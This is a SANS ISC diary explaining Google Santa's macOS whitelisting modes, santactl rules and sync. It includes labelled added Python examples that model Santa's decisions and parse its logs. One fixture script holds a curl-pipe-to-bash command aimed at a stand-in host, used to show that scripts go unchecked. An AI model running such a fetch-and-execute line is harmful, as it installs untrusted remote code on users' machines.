SANS ISC: Internet Storm Center


Track naughty and nice binaries with Google Santa

Published: 2018-05-23
Last Updated: 2018-05-23 11:49:43 UTC
by Remco Verhoef (Version: 1)

Santa is a binary whitelisting and blacklisting daemon for macOS. It has been developed by the Google Macintosh Operations Team (largest contributor: Russell Hancox) for over four years now, but it is not an official Google product. Google uses it internally to protect and monitor its macOS machines. The name comes from the fact that it keeps track of which binaries are naughty and which are nice.

The application has two modes, monitor and lockdown. In monitor mode every executed binary is logged and checked against the blacklist; only blacklisted binaries are stopped, everything else runs and is recorded in the events database. Each event contains the signing chain, the parent process name, the logged-in users, the file path, the bundle version, the executing user, the SHA-256 hash and some additional information about the file being executed. In lockdown mode only whitelisted binaries are allowed to run. For both whitelisting and blacklisting, a rule is keyed either on the binary itself (its SHA-256 hash; santactl takes a path and computes the hash for you, the rule does not match on the path) or on the signing certificate.

It is important to know that two immutable certificate rules are created on launch, whitelisting the signing certificates of santad and of launchd. This prevents Santa from blocking critical OS binaries or its own components, and it also means those two certificates cannot be blacklisted. Also be aware that scripts are not checked against the lists: Santa evaluates the Mach-O binary that the kernel actually loads, so for a script that is the interpreter (for example /bin/bash or /usr/bin/python), not the script file itself.

Santa consists of several daemons, a small GUI and santactl, the command-line tool used to talk to the daemons. The blacklists and whitelists are managed with santactl:

# whitelist a binary by its SHA-256 hash (santactl hashes the file at the given path)
$ santactl rule --whitelist --path "/path/to/bundle/or/file"
# whitelist by the signing certificate of the file at the given path
$ santactl rule --whitelist --certificate --path "/path/to/bundle/or/file"
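To make the mode semantics, the rule precedence, the two immutable certificate rules and the "scripts are not checked" caveat concrete, here is a small model of the allow/deny decision in Python. This is an added example, not Santa's own code. Everything in it is constructed: the files and certificate fingerprints are hypothetical stand-ins, the assumption that a binary (SHA-256) rule takes precedence over a certificate rule is stated as such, and the decision/reason labels merely imitate the vocabulary of Santa's logs.

```python
"""Model of Santa's per-execve() decision (added example, not Santa's code)."""
import hashlib
from typing import Dict, Optional, Tuple

MONITOR, LOCKDOWN = "MONITOR", "LOCKDOWN"
WHITELIST, BLACKLIST = "WHITELIST", "BLACKLIST"
ALLOW, DENY = "ALLOW", "DENY"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Hypothetical leaf-certificate fingerprints; on a real host these are whatever
# actually signs each binary.
APPLE_CERT = sha256_hex(b"hypothetical Apple Software Signing certificate")
SANTA_CERT = sha256_hex(b"hypothetical Google Santa signing certificate")
VENDOR_CERT = sha256_hex(b"hypothetical third-party vendor certificate")

# Constructed stand-in for files on disk: path -> (content, leaf cert or None).
# The cf fa ed fe prefix is the 64-bit Mach-O magic, used here to mark binaries.
MACHO = b"\xcf\xfa\xed\xfe"
FILESYSTEM: Dict[str, Tuple[bytes, Optional[str]]] = {
    "/sbin/launchd": (MACHO + b"launchd", APPLE_CERT),
    "/bin/bash": (MACHO + b"bash", APPLE_CERT),
    "/usr/local/bin/santad": (MACHO + b"santad", SANTA_CERT),
    "/Applications/Tool.app/Contents/MacOS/Tool": (MACHO + b"tool", VENDOR_CERT),
    "/tmp/dropper": (MACHO + b"dropper", None),  # unsigned binary
    "/tmp/evil.sh": (b"#!/bin/bash\ncurl http://example.invalid/x | bash\n", None),
}


class SantaModel:
    def __init__(self, mode: str = MONITOR) -> None:
        self.mode = mode
        self.binary_rules: Dict[str, str] = {}  # sha256(file) -> WHITELIST/BLACKLIST
        self.cert_rules: Dict[str, str] = {}    # cert fingerprint -> WHITELIST/BLACKLIST
        # The two immutable certificate rules created on launch: whatever signs
        # santad and launchd is whitelisted and cannot be changed afterwards.
        self.immutable = {FILESYSTEM["/usr/local/bin/santad"][1],
                          FILESYSTEM["/sbin/launchd"][1]}
        for cert in self.immutable:
            self.cert_rules[cert] = WHITELIST

    def add_rule(self, kind: str, path: str, certificate: bool = False) -> bool:
        """Mirror of `santactl rule --whitelist|--blacklist [--certificate] --path`.

        Returns False when the rule is refused: a certificate rule for an
        unsigned file, or an attempt to touch one of the immutable cert rules.
        """
        content, cert = FILESYSTEM[path]
        if certificate:
            if cert is None or cert in self.immutable:
                return False
            self.cert_rules[cert] = kind
        else:
            self.binary_rules[sha256_hex(content)] = kind
        return True

    def decide(self, path: str) -> Tuple[str, str, str]:
        """Return (decision, reason, evaluated_path) for an execve() of path."""
        content, cert = FILESYSTEM[path]
        if content.startswith(b"#!"):
            # The kernel executes the interpreter named in the shebang; that
            # Mach-O binary is what gets judged, never the script itself.
            interpreter = content.split(b"\n", 1)[0][2:].split()[0].decode()
            return self.decide(interpreter)
        rule = self.binary_rules.get(sha256_hex(content))
        if rule is not None:  # assumed: a binary rule beats any certificate rule
            return (ALLOW if rule == WHITELIST else DENY, "BINARY", path)
        rule = self.cert_rules.get(cert) if cert is not None else None
        if rule is not None:
            return (ALLOW if rule == WHITELIST else DENY, "CERT", path)
        # No rule matched, so the mode decides: monitor allows, lockdown denies.
        return (DENY if self.mode == LOCKDOWN else ALLOW, "UNKNOWN", path)


if __name__ == "__main__":
    santa = SantaModel(MONITOR)
    santa.add_rule(BLACKLIST, "/tmp/dropper")
    santa.add_rule(BLACKLIST, "/tmp/evil.sh")  # no effect: only /bin/bash is judged
    for p in FILESYSTEM:
        print(p, "->", santa.decide(p))
```

Running the model shows the two points that bite in practice: blacklisting the script's hash does nothing because /bin/bash (Apple-signed, hence covered by the launchd certificate rule) is what executes, and in lockdown mode an unsigned binary or an unknown vendor certificate is denied until you add a rule for it.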

santactl also reports the daemon's status and mode (santactl status), shows the hash, signing chain and applicable rule for a given file (santactl fileinfo), and lets you trigger and follow a sync with the server.

Corporate users will love sync, which allows central management of the whitelists and blacklists. Generated events are uploaded to the sync server, giving you statistics and data on executed and blocked binaries across the fleet. There are multiple open-source sync servers that can be used to manage rules and show events.
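Even without a sync server, the per-execution events are available locally in santad's log, and the first thing a practitioner does with them is find out what would break before switching a host from monitor to lockdown mode. The Python below is an added example, not code from Santa or from any sync server: it parses the pipe-separated key=value lines that santad writes (the layout is an assumption about santa.log's format, and the lines themselves are constructed sample data, not real events), then lists the binaries that ran with no matching rule and the executions that were denied.

```python
"""Mine santad's per-execution log lines (added example; constructed data)."""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample log; the field layout is assumed to follow santa.log.
SAMPLE_LOG = """\
[2018-05-23T11:49:43.000Z] I santad: action=EXEC|decision=ALLOW|reason=CERT|sha256=1a2b3c|cert_sha256=f00d|cert_cn=Software Signing|pid=512|ppid=1|uid=501|user=remco|gid=20|group=staff|mode=M|path=/bin/ls|args=ls -la /tmp
[2018-05-23T11:50:01.000Z] I santad: action=EXEC|decision=ALLOW|reason=UNKNOWN|sha256=deadbeef|pid=513|ppid=500|uid=501|user=remco|gid=20|group=staff|mode=M|path=/tmp/dropper|args=/tmp/dropper -s
[2018-05-23T11:50:02.000Z] I santad: action=EXEC|decision=ALLOW|reason=UNKNOWN|sha256=deadbeef|pid=515|ppid=500|uid=501|user=remco|gid=20|group=staff|mode=M|path=/private/tmp/dropper|args=dropper -s
[2018-05-23T11:50:03.000Z] I santad: action=EXEC|decision=ALLOW|reason=UNKNOWN|sha256=c0ffee|pid=516|ppid=1|uid=0|user=root|gid=0|group=wheel|mode=M|path=/usr/local/bin/tool|args=tool --flag=a|b
[2018-05-23T11:50:05.000Z] I santad: action=EXEC|decision=DENY|reason=BINARY|sha256=deadbeef|pid=517|ppid=500|uid=501|user=remco|gid=20|group=staff|mode=L|path=/tmp/dropper|args=/tmp/dropper
[2018-05-23T11:51:00.000Z] I santad: action=WRITE|path=/tmp/notes.txt
"""

# [timestamp] <level> <process>: <pipe-separated key=value fields>
LINE_RE = re.compile(r"^\[(?P<ts>[^\]]+)\] (?P<level>\S) (?P<proc>\w+): (?P<rest>.*)$")


def parse_santa_log(text: str) -> List[Dict[str, str]]:
    """Return one dict per parseable line, keyed by the log's field names plus 'ts'."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        event = {"ts": m.group("ts")}
        fields = m.group("rest").split("|")
        for i, field in enumerate(fields):
            key, _, value = field.partition("=")
            if key == "args":
                # args is the last field and the command line may itself
                # contain '|', so glue the remaining pieces back together.
                event[key] = "|".join([value] + fields[i + 1:])
                break
            event[key] = value
        events.append(event)
    return events


def unknown_binaries(events: List[Dict[str, str]]) -> Dict[str, set]:
    """sha256 -> paths for binaries that executed with no matching rule.

    In monitor mode this is exactly the whitelist you still have to build
    (or the blacklist you still have to write) before going to lockdown.
    """
    out = defaultdict(set)
    for e in events:
        if e.get("action") == "EXEC" and e.get("reason") == "UNKNOWN":
            out[e["sha256"]].add(e["path"])
    return dict(out)


def denied(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Executions that Santa actually stopped."""
    return [e for e in events if e.get("action") == "EXEC" and e.get("decision") == "DENY"]


if __name__ == "__main__":
    evs = parse_santa_log(SAMPLE_LOG)
    for digest, paths in unknown_binaries(evs).items():
        print("no rule:", digest, sorted(paths))
    for e in denied(evs):
        print("denied:", e["ts"], e["user"], e["path"], "reason", e["reason"])
```

Keying the "no rule" summary on the hash rather than the path matters: the same dropper shows up under /tmp and /private/tmp, and a rule written for the hash covers both, which is also why Santa's rules are hash or certificate based and not path based.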

I have been a happy Google Santa user for a few years now; it gives me insight into and control over the binaries that are being executed. There is much more to be told about this application; take a look at the docs for more information.


Keywords: mac os x whitelist